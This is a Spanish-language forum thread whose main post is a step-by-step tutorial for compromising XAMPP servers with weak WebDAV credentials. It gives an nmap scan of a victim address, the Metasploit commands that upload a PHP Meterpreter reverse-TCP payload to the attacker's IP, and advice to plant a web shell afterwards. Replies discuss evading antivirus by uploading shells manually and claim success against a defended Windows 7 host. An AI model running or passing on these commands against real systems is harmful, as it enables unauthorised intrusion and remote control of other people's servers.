(http://www.tutorialesubuntu.com/xamppico.png)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
XAMPP es una forma fácil de instalar la distribución Apache que contiene MySQL, PHP y Perl. XAMPP es realmente simple de instalar y usar - basta descargarlo, extraerlo y comenzar.
La distribución de Windows 2000, 2003, XP, Vista y 7 contiene Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Actualmente el servicio XAMPP, usado por la mayoria de webmasters y usuarios que se dedican a la Programación Web son totalmente vulnerables y se ha creado un modulo en metasploit que explota contraseñas débiles WebDAV en los servidores XAMPP y utiliza credenciales proporcionadas para subir una carga útil de PHP y ejecutarlo. El exploit se encuentra disponible desde http://www.metasploit.com/modules/exploit/windows/http/xampp_webdav_upload_php y los pasos para aprovecharse de esta vulnerabilidad, son los siguientes:
REQUERIMIENTOS:- BackTrack 5 R1 - R2 o R3 (Atacante)
- Metasploit Framework (Atacante)
- Windows XP - 7 - 8 (Victima)
- XAMPP (Victima)
PROCEDIMIENTOS:Primeramente tenemos que detectar si la PC victima esta ejecutando el servicio XAMPP, para ello usaremos Nmap, ejecutando el siguiente comando:
nmap -sS -T4 -A 192.168.1.38(http://i49.tinypic.com/do875e.png)
Si los resultados se muestran tal cual con la imagen de arriba, quiere decir que la PC victima esta ejecutando el servicio XAMPP en el puerto 80 y 443, entonces para aprovecharnos de la vulnerabilidad mencionada lineas arriba, simplemente abriremos metasploit y ejecutamos los siguientes comandos:
use exploit/windows/http/xampp_webdav_upload_php
set payload php/meterpreter/reverse_tcp
set Lhost 192.168.1.36 (Nuestra IP)
set RHOST 192.168.1.38 (IP Victima)
exploit(http://i45.tinypic.com/21brxmo.png)
Estos comandos haran que se ejecute un payload en php la cual automaticamente se "subira" en el servicio XAMPP de la PC victima.
(http://i50.tinypic.com/k9ez9.png)
Seguidamente si todo se realizo correctamente, recibiremos la session meterpreter gracias al payload que metasploit subio al servicio XAMPP vulnerable.
(http://i49.tinypic.com/idatcl.png)
Lo demas ya queda a nuestra total disposicion, en este caso podemos subir una web shell ya que XAMPP es un servicio web, por lo que podemos ingresar desde nuestro navegador a la IP vulnerada y ejecutar comandos desde la shell.
Espero les sirva y practiquen ;)
Limpio tema , pero si estoy de acuerdo en quien hizo este payload anda algo tocao del tarro.
Una cosa es automatizar procesos y otro muy distinto que hagan todo por ti.
Reabierto.
Cuando uno conoce sobre las vulnerabilidades y la forma de explotar manualmente, puede realizar el mismo ataque automatizado.
Y como dice el usuario Matabarras, esta se puede explotar usando el programa que menciona, como también con el Metasploit, tal cual se muestra en este post y con ambos se obtiene el mismo resultado, solo varian la forma en que el usuario pueda realizar sus pruebas.
Saludos.
Bueno aparte, de lo que ya dije.
Es mejor de forma manual o con Bitkinex, por varios motivos..
Entre ellos, que si la 'victima' tiene antivirus, y la shell de msf, es detectada, la borra.
En cambio así puedo subir la shell que quiera.
Saludos
Las pruebas las he realizado en un Sistema Operativo Windows 7 con el Firewall y Antivirus respectivamente activos y el resultado es exitoso.
Existen muchas formas de aprovecharse de alguna vulnerabilidad en una plataforma y/o software, pero siempre el usuario elige lo que mas le convenga.
Es cuestión de gustos, por ejemplo si estoy en Windows puedo usar el programa que mencionas, pero si estoy en linux puedo usar el MSF ya que como vuelvo a repetir con ambos se obtiene el mismo resultado.
Este Post no es con el fin de "obligar" al usuario que opte por realizar dicho método, simplemente se muestra otra manera de ataque en un sistema distinto.
Saludos.